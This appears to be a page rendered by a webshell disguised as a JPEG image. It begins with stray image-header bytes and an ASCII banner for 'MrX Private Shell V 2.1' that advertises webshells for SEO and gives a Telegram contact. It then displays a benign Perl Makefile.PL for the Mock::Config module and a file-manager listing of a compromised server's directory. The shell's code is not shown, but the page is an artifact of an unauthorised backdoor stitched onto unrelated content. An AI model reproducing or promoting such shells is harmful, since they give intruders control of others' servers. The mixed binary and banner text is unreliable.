����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
use 5.006;
use strict;
use warnings;
use ExtUtils::MakeMaker;
WriteMakefile(
NAME => 'Mock::Config',
AUTHOR => q{Reini Urban <rurban@cpan.org>},
VERSION_FROM => 'lib/Mock/Config.pm',
ABSTRACT_FROM => 'lib/Mock/Config.pm',
LICENSE => 'artistic_2',
PL_FILES => {},
MIN_PERL_VERSION => 5.006,
CONFIGURE_REQUIRES => {
'ExtUtils::MakeMaker' => 0,
},
BUILD_REQUIRES => {
'Test::More' => 0,
},
PREREQ_PM => {
#'ABC' => 1.6,
#'Foo::Bar::Module' => 5.0401,
},
clean => { FILES => 'Mock-Config-*' },
SIGN => 1,
dist => {
PREOP => 'pod2text \$(VERSION_FROM) | tee README >$(DISTVNAME)/README; chmod -R u=rwX,go=rX . ;',
COMPRESS => 'gzip -9v',
SUFFIX => '.gz',
},
($ExtUtils::MakeMaker::VERSION gt '6.46' ?
('META_MERGE' =>
{suggests =>
{
'XSConfig' => '6.19',
},
resources =>
{
license => 'http://dev.perl.org/licenses/',
bugtracker => 'https://github.com/perl11/Mock-Config/issues',
repository => 'https://github.com/perl11/Mock-Config',
},
}
) : ()),
);
package MY;
sub top_targets {
local $_ = shift->SUPER::top_targets(@_);
s/\$\(FIRST_MAKEFILE\) blibdirs/\$(FIRST_MAKEFILE\) blibdirs README/;
$_
}
sub depend {
"
README : \$(VERSION_FROM)
pod2text \$(VERSION_FROM) > README
release : xtest dist
if test \"\$(shell git rev-parse --abbrev-ref HEAD)\" != \"master\" || \\
test \"\$(shell git diff --raw)\" != \"\" || \\
test \"\$(shell git diff --cached --raw)\" != \"\" ; then \\
echo 'You are not on a clean master branch, aborting.'; \\
exit 1; \\
fi
-git tag -f \$(VERSION)
cpan-upload \$(DISTVNAME).tar\$(SUFFIX)
git push
git push --tags
xtest :
\$(MAKE) test RELEASE_TESTING=1
"
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| blib | Folder | 0755 |
|
|
| lib | Folder | 0755 |
|
|
| t | Folder | 0755 |
|
|
| .gitignore | File | 152 B | 0644 |
|
| Changes | File | 495 B | 0644 |
|
| MANIFEST | File | 367 B | 0644 |
|
| META.json | File | 1.23 KB | 0644 |
|
| META.yml | File | 754 B | 0644 |
|
| MYMETA.json | File | 1.23 KB | 0644 |
|
| MYMETA.yml | File | 754 B | 0644 |
|
| Makefile | File | 30.21 KB | 0644 |
|
| Makefile.PL | File | 1.8 KB | 0644 |
|
| README | File | 3.55 KB | 0644 |
|
| SIGNATURE | File | 2.15 KB | 0644 |
|
| pm_to_blib | File | 0 B | 0644 |
|